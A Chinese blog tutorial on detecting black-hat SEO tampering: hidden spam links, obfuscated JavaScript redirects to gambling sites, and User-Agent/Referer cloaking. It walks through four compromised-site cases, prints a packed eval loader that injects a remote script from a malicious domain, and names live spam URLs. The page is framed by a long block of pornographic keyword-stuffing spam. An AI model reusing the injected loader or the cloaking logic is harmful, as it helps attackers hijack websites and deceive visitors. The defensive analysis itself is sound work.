久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品

合作QQ:25496334 TG@heimao_wiki
當前位置:首頁 >> 黑帽技術 >> SEO攻防 >> 黑鏈驗證:網站惡意篡改

黑鏈驗證:網站惡意篡改

yupang SEO攻防 1016
  1. 網頁介紹

  2. 頁面篡改

  3. 驗證黑鏈常用工具

  4. 查找黑鏈常用方法-實戰案例


2|0 1.1 網頁

網頁由html+css+javascript組成,以人做舉例,html描述了人有臉,有脖子,有身體,有四肢,css描述了每個部分如何鏈接,javascript決定了人的思想是什么樣的。

2|11.1.1 Html

超文本標記語言 Hyper Text Markup LanguageHTML 是用來描述網頁的一種語言。只有html的頁面是沒有靈魂的人,不知道餓了該去吃飯,不知道見到人該去打招呼

【如果想簡單學習玩耍請參考此鏈接:http://www.w3school.com.cn/html/index.asp】

2|21.1.2 Javascript

一種腳本語言,其源代碼在發往客戶端運行之前不需經過編譯,而是將文本格式的字符代碼發送給瀏覽器由瀏覽器解釋運行。有了javascript(之后簡稱js)網頁才能根據一些外界條件發生變化

【如果想簡單學習玩耍請參考此鏈接:http://www.w3school.com.cn/js/index.asp】


3|0 1.2 頁面篡改

網站頁面內產生了網站所有者意想之外的變化,網站遭殃*_*

3|11.2.1 SEO

SEO全稱為搜索引擎優化,是指通過站內優化、站外優化等方式,提升搜索引擎收錄排名。搜索空氣凈化器,顯示如下:

 

為什么顯示順序為京東->亞馬遜->知乎,而不是其他順序?

>>>首先引入概念PR值:

PR值全稱為PageRank(網頁級別)PR值是Google用于標識網頁的等級、重要性、網站的好壞的重要標準之一。級別從010級為滿分。PR值越高說明該網頁越受歡迎。

例如:一個PR值為1的網站表明這個網站不太具有流行度,而PR值為710則表明這個網站非常受歡迎(或者說極其重要)。一般PR值達到4,就算是一個不錯的網站了。Google把自己的網站的PR值定到9,這說明Google這個網站是非常受歡迎的,也可以說這個網站非常重要。

【PR查詢頁面:http://pr.chinaz.com】

  PR高的網站不一定排名就好,但是大部分內頁的排名都不錯,PR高的網站分流到內頁的權重比PR低的網站分配到內頁的權重也高,排名相對也好,排名的計算方法很復雜,因此排名好的也不一定PR就高。

  既然有SEO技術,便會有相應的從業人員,他們被稱為白帽SEO,專指通過公正SEO手法,幫助提升站點排名的專業人員。當然有白便會有黑,由于白帽SEO優化的過程將會十分漫長,一個新站想要獲取好的排名,往往需要花上幾年時間做優化推廣。因此一些想要快速提升自身網站排名的小伙伴,便開始在SEO上研究作弊手法,從而誕生了黑帽SEO。黑帽SEO是指通過作弊手段,讓站點快速提升排名的一類SEO技術,或者說是黑客技術,比如說:黑鏈(暗鏈)、站群、網站劫持(搜索引擎劫持)、橋頁等,黑帽SEO能夠快速提升排名,但畢竟是違規作弊行為


4|0 1.3 基礎知識(以下內容使用瀏覽器都為火狐瀏覽器)

4|11.3.1 常用工具-源代碼

常用快捷鍵:ctrl+u(也可以在頁面前添加view-source:)

特點:只展示HTML代碼,顯示相關CSSJS鏈接,但是并不加載

用途:粗略查看相關源代碼

 

 

4|21.3.2 常用工具-審查元素-查看器

常用快捷鍵:F12(查看器標簽)

特點:該頁面會加載對應的js以及css,是一個更直觀的輸出展示頁面

用途:詳細查看相關源代碼

 

4|31.3.3 常用工具-審查元素-控制臺

用途:解密js進行快捷輸出

加密js

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4.7(\'<0 c="1" 5="6/1" 3="8://9.a.b/2/d.2"></0>\');',14,14,'
script|javascript|js|src|document|type|text|write|http|cq|355sf|com|language|bc'.split('|'),0,{}))

eval函數去掉,直接復制黏貼進控制臺就可以輸出解密后的js

 

4|41.3.4 常用工具-審查元素-網絡

用途:在不打開burp的前提下快速查看相關請求以及相應響應

 

 

4|51.3.5 常用工具-解密網站

推薦js界面網站:https://tool.lu/js/

1.3.3js解密為:

 

 

4|61.3.6 常用工具-User-Agent Switcher

用途:修改HTTP請求頭中的User Agent(之后統一簡稱UA)字段,該字段通常用來表示使用者身份,如:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0

  對于搜索引擎來說,為了區分自身和正常人的行為,爬蟲會修改自己的UA為一個公共聲明標識的UA如:360spider,這也為黑產對抗留下了入口,黑產從業者會通過js/后端php來進行請求頭判斷,如果是來自搜索引擎的流量,則展示黑產頁面,如果是正常訪客的UA則展示正常的頁面。這樣可以極大加強隱蔽自身的能力。

1.安裝鏈接:https://addons.mozilla.org/firefox/downloads/file/1145502/user_agent_switcher-1.2.3-an+fx.xpi?src=search

2.安裝后進入附加組件,找到該插件點擊首選項進行配置

google bot下面增加如下配置:

Baidu Bot [Bot]: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

360 [Bot]: 360Spider

 

3.勾選任意一個,進行任意域名訪問

請求頭中User-Agent為對應勾選的User-Agent頭即為配置成功

 

 

4|71.3.7 常用工具-referer control

用途:控制網站請求頭中的Referer字段,該字段本身是用于記錄當前網頁的來源。

  通常來說搜索引擎的爬蟲每次爬行都會將內容運回搜索引擎的數據庫,所以通常爬蟲對頁面請求的上一跳中也一定會包含baidu/360/sougou/so/google等瀏覽器信息,

這又為黑產提供了隱藏自身行為的入口,通常也是通過js/php進行referer判斷,如果包含搜索引擎相關字樣則進行跳轉到希望被引流的賭博頁面,如果不包含則不跳轉。

 


5|0 1.4 查找黑鏈常用方法

修改User-Agent頭

修改referer

修改html代碼中屬性設置為隱藏的標簽

 

5|1>>>篡改實戰

5|21.4.1 篡改案例1

http://www.lcwsj.com/lcxinwen/2018041609219.html 

首先我們打開審查元素-網絡,打開這個網站,可以在下方的一系列跳轉中看到網站跳轉到了一個賭博網站:http://www.866bc.com:8080/,我們現在來分析整個跳轉過程中到底發生了什么。

>>> 因為網站我們并不能看到上面URL的內容,首先在網絡中找到對應這條請求

 

 

>>> 可以看到狀態碼是200,在HTTP狀態碼中只有3系列才可以執行跳轉,那么問題應該出現在前端的js導致了異常跳轉,這時候我們使用前面說到的查看源代碼來防止js的加載,可以看到如下部分

 

 

>>> 這是一段做過混淆加密的js,我們將其放到控制臺中進行解密獲得如下內容

 

 

可以看到一個新的jshttp://cq.355sf.com/js/bc.js

我們再次訪問這個js可以看到如下部分:

 

 

Tipshm.baidu.comjs.user.51.la都是網站流量統計工具,給網站站長進行流量分析的東西,可以忽略;

其他部分我們又看到了一個新的js: http://cq.355sf.com/js/tiao.js

我們又訪問了這個js可以看到如下部分:

 

 

這又是一個加密混淆的js,我們依然使用之前的控制臺進行解密

 

代碼解讀:

首先進行地點判斷,如果屬于北京、杭州、柬埔寨等地方,則展示一個404頁面,如果不屬于這些地方則判斷當前頁面有沒有父頁面(從a網站點擊鏈接觸發到這個js)如果存在父頁面,則將父頁面感染為http://m.22571777.com:8888/?a=69447,然后將打開頁面展示為http://www.866bc.com:8080

5|31.4.2 篡改案例2

http://www.aswlw.org.cn/

這個網站并不像案例1中直接跳轉到了賭博網站,這并不意味著這個網站沒有發生篡改

查看源代碼到最下面,可以看到

 

 

這種使用十六進制編碼的形式寫代碼不是一般正常的寫代碼思路,這里其實就起了疑心,我們對其進行解碼,使用工具網站:https://www.bejson.com/convert/ox2str/

 

 

可以看到是一些標簽屬性,里面看到關鍵字liblinlpa,再回看源代碼,上方友情鏈接標簽的id就是liblinlpa,又看到解密的內容中有display none的字樣,故猜測這段加密代碼的意義在于使上面被篡改的鏈接隱藏,防止被站長發現,進而被刪除。進而我們嘗試去訪問上方的友情鏈接

 

可以看到含有專業性賭博詞匯:pk10的專項詞優化頁面;

依次打開其他友情鏈接,也可以看到都和賭博有關

 

5|41.4.3 篡改案例3

http://www.drughk.com/cpzs.asp?upid=202&typeid=405&newsid=765

首先打開網站,我們初步審查源碼可以看到基本上沒有看起來不合理的地方

 

 

但是這里我們使用我們的user agent switcher 插件轉換UA360spider以后

源碼中出現了

 

 

Displaynone是一個黑產很常用的隱蔽手法,我們雙擊none改為true

回到html頁面,可以看到原文中出現了如下內容

 

隨便點擊一個content內容可以看到基本上都是跳轉到了不同的色情網站

 

5|51.4.4 篡改案例4

http://android.zgzg.org.cn/

1.首先訪問頁面:

 

2.通常這個頁面為網站狀態碼為404以后展示的頁面

但是仔細在網絡中看一下響應包:

 

 

3.可以看到響應碼是200

這就是一個非常不科學的事情,頁面展示404頁面,狀態碼卻是200,這只能猜測404頁面是人偽造的,其實這個頁面是存在的,只是有人把內容偽裝成了404頁面的內容,所以成功響應,并顯示404頁面;

4.繼續進入源碼分析:

源碼中涉及3js,但是和為什么網站顯示404頁面,但是響應碼為200都沒什么關系。

這時候我們嘗試改一下UA360spider,發現網站顯示到如下頁面

 

 

那么網站是否產生了真實的篡改,初步判斷是一定存在篡改

但是遍歷頁面每一個元素,沒有找到真實被篡改的地方

 

 

5.這依然不意味著不存在篡改,我們進入審查元素-網絡,選擇第一個網站請求,查看響應標簽中的響應載荷

可以看到響應載荷中的最下面存在大量色情專項優化詞匯

 

 

這里我們可以確定網站一定是被篡改了

那么頁面上這幾千個敏感詞到底在什么位置,我們看敏感詞上面一行代碼

 

 

6.Marquee是跑馬燈,這里我們還看到了height=3,在html3是一個非常小的值,我們重新看到原網頁,翻到最下面,看到了一小排綠色的奇怪東西

 

鼠標努力勾選復制一下,找個地方黏貼出來,就能看到大量的敏感詞了

5|61.4.5 最后

網站篡改技術和篡改對抗技術的更新速度是異常快的,舉例子是舉不完的,只能靠異于常人的細心和耐心抽絲剝繭來完成對抗


協助本站SEO優化一下,謝謝!
關鍵詞不能為空

免責聲明

資料匯總于網絡,如有侵權 聯系站長刪除 http://www.790079.com

同類推薦

發表評論

訪客

◎歡迎參與討論,請在這里發表您的看法和觀點。
久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品
91九色视频在线观看| 99在线热播| 一区二区视频国产| 久久精品视频va| 久久久久久久成人| 色老头一区二区三区在线观看| 7777精品久久久大香线蕉小说| 99久久99久久精品国产片| 粉嫩av四季av绯色av第一区| 国产噜噜噜噜久久久久久久久| 国产一区二区片| 国产在线精品播放| 精品www久久久久奶水| 品久久久久久久久久96高清 | 久久久久久久久久久久久久国产| 久久国产精品免费一区| 久艹在线免费观看| 久久精品中文字幕一区| 超碰91人人草人人干| 九九久久综合网站| 亚洲精品中字| 欧美在线日韩精品| 蜜臀av.com| 国产精品亚洲综合| 国产精品999999| 久久国产手机看片| 久久精品99无色码中文字幕| 国产精品美女主播在线观看纯欲| 国产精品第10页| 亚洲五月六月| 日本一区二区久久精品| 欧美高清性xxxxhd| 国产精品一区二区三| 91精品在线播放| 国产精品丝袜视频| 一区二区三区观看| 日韩欧美精品在线不卡| 国产日韩欧美影视| 91国产精品91| 国产精品免费观看高清| 在线视频不卡一区二区三区| 日本成人黄色| 福利在线一区二区| 久久久久久久久久久久久久国产| 国产精品极品美女在线观看免费 | 久久精品日韩精品| 久久香蕉国产线看观看av| 亚洲精品欧美极品| 免费日韩中文字幕| 国产激情久久久| 欧美成人精品在线观看| 日韩在线第三页| 狠狠久久综合婷婷不卡| 国产大片精品免费永久看nba| 精品乱子伦一区二区三区| 日本伊人精品一区二区三区介绍| 国产综合视频在线观看| 国产黄色特级片| 欧美巨大黑人极品精男| 日韩男女性生活视频| 超碰成人在线免费观看| 国产精品久久久久久亚洲调教| 午夜精品久久久久久99热 | 久无码久无码av无码| 久久久国产精品x99av| 亚洲一区二区三区sesese| 欧美日韩精品不卡| 久久久欧美一区二区| 欧美激情一区二区久久久| 黄页免费在线观看视频| 久久久久久久影院| 欧美一区二区三区艳史| 成人黄动漫网站免费| 国产精品大片wwwwww| 欧美日韩dvd| 国产不卡一区二区在线播放| 亚洲精品中文字幕乱码三区不卡| 国产一区二区免费电影| 国产精品久久久久久久久影视 | 亚洲va久久久噜噜噜| 国产女精品视频网站免费| 国产精品久久久久9999小说| 青青视频在线播放| 国产不卡一区二区视频| 亚洲国产高清国产精品| 99久久久精品视频| 中文字幕无码精品亚洲35| 国产日韩av网站| 久久成年人视频| 精品一区二区久久久久久久网站| 国产精品免费一区二区三区| 欧美日韩一区在线播放| 日韩亚洲综合在线| 日本久久久久久久久久久| …久久精品99久久香蕉国产| 亚洲国产精品一区在线观看不卡| www婷婷av久久久影片| 一区二区三区观看| www久久99| 色噜噜狠狠色综合网| 久久久久国产精品熟女影院| 日韩中文字幕在线不卡| 国产不卡一区二区三区在线观看| 日本在线观看天堂男亚洲| 久久久久久久一区二区| 欧美日韩国产综合在线| 精品国产一区二区三区四区精华| 国产美女主播在线| 一区二区三区av| 91av成人在线| 日韩欧美一区二区三区四区| 国产成人免费高清视频| 国产有码在线一区二区视频| 中文字幕色一区二区| 久久人人爽人人爽人人av | 久久福利视频网| 国产精品亚洲天堂| 日韩av免费看| 国产精品免费电影| 成人www视频在线观看| 少妇久久久久久被弄到高潮 | 天堂av一区二区| 国产精品网红直播| 国产精选一区二区| 日本精品免费视频| 国产精品色悠悠| 99在线看视频| 欧美在线欧美在线| 中文字幕黄色大片| 国产成人97精品免费看片| 久久久久久尹人网香蕉| 亚洲一区二区三区在线观看视频 | 国产免费xxx| 午夜精品久久久久久久男人的天堂| 国产成人一区二区三区小说| 欧美亚洲另类在线一区二区三区| 国产精品成熟老女人| www.浪潮av.com| 日韩精品―中文字幕| 欧美亚洲成人网| 美女精品久久久| 久久国产精品高清| 国产日本欧美在线| 午夜精品美女久久久久av福利| 久久精品中文字幕一区| 99在线观看视频免费| 欧美国产一区二区在线| 亚洲精品一品区二品区三品区| 国产成人精品无码播放| www婷婷av久久久影片| 欧美少妇在线观看| 午夜免费久久久久| 精品国产一区三区| 日韩在线观看精品| 91观看网站| 国产欧美日韩精品专区| 欧美一级大片在线观看| 亚洲女人毛片| 国产精品久久久亚洲| 国产激情视频一区| 不卡一区二区三区视频| 欧美怡春院一区二区三区| 亚洲爆乳无码专区| 久久国产视频网站| 国产精品欧美亚洲777777| 国产高潮呻吟久久久| 国产精品亚洲自拍| 国产综合视频在线观看| 日韩精品视频一区二区在线观看| 亚洲国产精品日韩| 久久99精品视频一区97| 国产精品久久色| 久久久国产成人精品| 国产成人精品久久二区二区91| 97免费视频在线| 国产精品一区久久| 国产欧亚日韩视频| 国产午夜精品视频一区二区三区| 欧美久久久久久久久久久久久久| 日韩av第一页| 日韩av在线第一页| 无码少妇一区二区三区芒果| 亚洲日本理论电影| 亚洲一区二区三区四区中文| 中文精品一区二区三区| 美女久久久久久久| 精品国产aⅴ麻豆| 久久成年人免费电影| 国产精品无码人妻一区二区在线| 国产a级片免费观看| 久久精品国产sm调教网站演员| 久久男人资源视频| 国产黄色特级片| 九九九九九精品| 久久久久久久久久久成人| 国产成人avxxxxx在线看| 久久久噜噜噜久久中文字免| 色婷婷久久av| 国产精品无码一本二本三本色| 国产精品久久久久不卡|